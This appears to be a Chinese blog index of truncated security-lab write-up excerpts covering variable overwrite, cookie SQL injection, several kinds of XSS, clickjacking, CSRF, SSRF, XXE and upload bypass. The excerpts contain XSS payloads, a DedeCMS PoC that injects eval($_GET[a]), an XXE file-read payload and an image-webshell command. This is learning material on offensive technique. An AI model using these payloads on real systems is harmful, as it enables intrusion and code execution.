漏洞挖掘-覆盖变量漏洞 writeup
首先先下载duomiCMS的源代码https://www.duomicms.net/portal.php?mod=attachment&id=20然后在seay审计系统里打开源码,在系统配置中的规则管理里添加规则([^\$"]|$)\$\{?\$然后开始自动审计发现在upload/duomiphp/common.php下的foreach(Array('_GET',
Access注入 — Cookie注入 writeup
发现这个靶场一直都还没有做,先把这个漏的做了。cookie注入的原理是利用request接受传参,但是只过滤了传进来的post和get数据,并没有过滤cookie的数据,所以导致cookie注入。一进去,嗯,是熟悉的雕塑站。既然是cookie注入,我们先访问http://120.203.13.75:8001/shownews.asp?id=170然后将cookie设置为id=171然后再访问htt
DOM XSS靶场-writeup
进去首先是一个聊天室,我们发现是这个样子的发现最上面有一个/3/很诡异,发现url里也有类似的东西,我们尝试改一下urlhttp://120.203.13.75:6815/3/?123发现上面的/3/变成了/3/?123也就是说这里可以打一个xss,我们把url改成http://120.203.13.75:6815/3/?</script><script>alert`123
存储型Xss靶场-writeup
首先进去是一个cms,我们查阅资料,有如下https://www.jianshu.com/p/200ea62486d9漏洞的流程是:1.当访问页面不存在的方法或对象时,会调用show_404方法,且该方法没有过滤html敏感字符2.错误的信息又会调用log_message方法。3.将错误的信息写进log日志文件中,会调用write_log方法。4.write_log方法会创建log日志的文件来记录
反射型XSS靶场writeup
现在来补一波xss的靶场。。之前一直没有做进入靶场先是一波魔性狗头,我们先随便输入一个东西,看看哪里有显示,有显示的地方就可能有漏洞。也就是说有两个显示位,我们输入<script>alert`123`</script>发现并没有弹窗,使用F12的html编辑我们发现<>均被html实体编码,也就是说等同于我们输入了一个没有什么用的字符串。我们观察上面的显示位在h
点击劫持与跳转
首先感谢ssg老师,我刚开始根本没想到元素堆叠的问题,导致我很迷茫,思考人生了一个下午。先上代码<!DOCTYPE html><html><head> <title> 脑力大测试~</title> <meta charset="UTF-8"> <style&nb
CSRF跨站伪造请求 - 屠龙宝刀点击就送
先登陆才能触发漏洞adminadmin123其实这个题很简单先放上POChttp://localhost/dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//http://localhost/dedecms/uplo
SSRF漏洞和利用
SSRF漏洞可以让外部用户通过web服务器访问内网资源。以下来自百度很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Request Forgery)。靶场有
微信0day实例—XXE实体注入
我们先把POC贴上来<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/PHPTutorial
上传内容验证和HTTP HEAD MIME验证
上传内容验证直接用copy 1.jpg/b+2.php/a webshell.jpg这样即可制作图片马上传即可HTTP HEAD MIME验证用bp抓个包Content-Disposition: form-data; name="upload_file"; filename="123.php"Content